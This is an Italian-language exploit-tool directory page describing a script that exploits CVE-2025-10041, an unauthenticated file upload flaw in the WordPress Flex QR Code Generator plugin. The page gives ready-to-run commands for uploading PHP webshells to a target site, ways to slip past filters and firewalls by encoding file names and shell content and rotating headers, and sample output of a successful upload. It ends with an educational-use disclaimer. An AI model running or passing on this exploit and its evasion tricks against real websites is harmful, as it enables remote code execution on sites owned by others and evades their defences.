Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-10041 — Flex QR Code Generator <= 1.2.5 - Caricamento arbitrario di file non autenticato | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-10041
Generazione di PayloadAnalisi delle VulnerabilitàExploitEvasione IDS/IPSSfruttamento di Applicazioni WebBypass WAF
GitHubnxploited/cve-2025-10041

CVE-2025-10041

Flex QR Code Generator <= 1.2.5 - Caricamento arbitrario di file non autenticato

Vedi Repository
3310 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-10041

Flex QR Code Generator <= 1.2.5 - Upload Arbitrario di File Non Autenticato

🚨 Flex QR Code Generator ≤ 1.2.5 - Upload Arbitrario di File Non Autenticato


📝 Descrizione

Il plugin Flex QR Code Generator per WordPress è vulnerabile al caricamento arbitrario di file a causa della mancata validazione del tipo di file nella funzione save_qr_code_to_db() in tutte le versioni fino alla 1.2.5 inclusa.
Ciò consente ad attaccanti non autenticati di caricare file dannosi sul server del sito interessato, portando potenzialmente all'esecuzione remota di codice.

  • CVE: CVE-2025-10041
  • CVSS: 9.8 (Critical)

💡 Informazioni sullo Script

CVE-2025-10041.py è uno strumento di exploit professionale progettato per automatizzare l'attacco sfruttando questa vulnerabilità.
Fornisce funzionalità avanzate per bypassare le protezioni comuni e le tecniche di codifica.


⚙️ Caratteristiche

  • Rilevamento automatico della vulnerabilità (controllo della versione)
  • Caricamento arbitrario di file (incluse webshell PHP)
  • Bypass della codifica del nome file: codifica Base64 o URL
  • Bypass della codifica del contenuto: wrapper PHP base64 per il codice della shell
  • Header HTTP casuali per eludere i WAF di base
  • Supporto per header personalizzati
  • Interfaccia a riga di comando completa con parsing degli argomenti e messaggio di aiuto

🖥️ Utilizzo

1. Exploit di Base

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com

2. Codifica del Nome File della Shell

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --encode_filename base64
python3 CVE-2025-10041.py -u http://target.com --encode_filename url

3. Codifica del Contenuto della Shell

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --encode_content base64

4. Nome File della Shell Personalizzato

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --shellname myevil.php

5. Avanzato (Combina Opzioni)

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --encode_content base64 --encode_filename base64 --shellname myevil.php

6. Header Personalizzati

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --headers "X-Forwarded-For: 127.0.0.1" "Cookie: PHPSESSID=1337"

🆘 Aiuto

Per vedere tutte le opzioni disponibili e le istruzioni d'uso:

root@kitploit:~
python3 CVE-2025-10041.py --help

🔓 Tecniche di Bypass

  • Codifica del nome file: alcuni server bloccano .php o nomi sospetti; la codifica può eludere i filtri.
  • Codifica del contenuto: avvolgere il codice della shell in eval(base64_decode(...)) può bypassare i filtri sui contenuti.
  • Header casuali: rotazione di user-agent, referer e cookie per evitare il rilevamento.
  • Header personalizzati: aggiungi i tuoi header per un'evasione avanzata.

📋 Output di Esempio

root@kitploit:~
Checking vulnerability version...
Target is vulnerable ...
Exploiting ...
Uploading shell 'shell.php' ...
Shell uploaded successfully.
Shell path (guess): /wp-content/uploads/shell_3.php
Response: {...}

⚠️ Disclaimer

Questo script è fornito esclusivamente a scopo educativo, di ricerca e di test di penetrazione autorizzati.
L'uso non autorizzato su sistemi che non possiedi o per i quali non hai esplicito permesso di testare è severamente proibito e illegale.
L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento.


✍️ Autore:

Nxploited (Khaled Alenazi)


Scarica lo strumento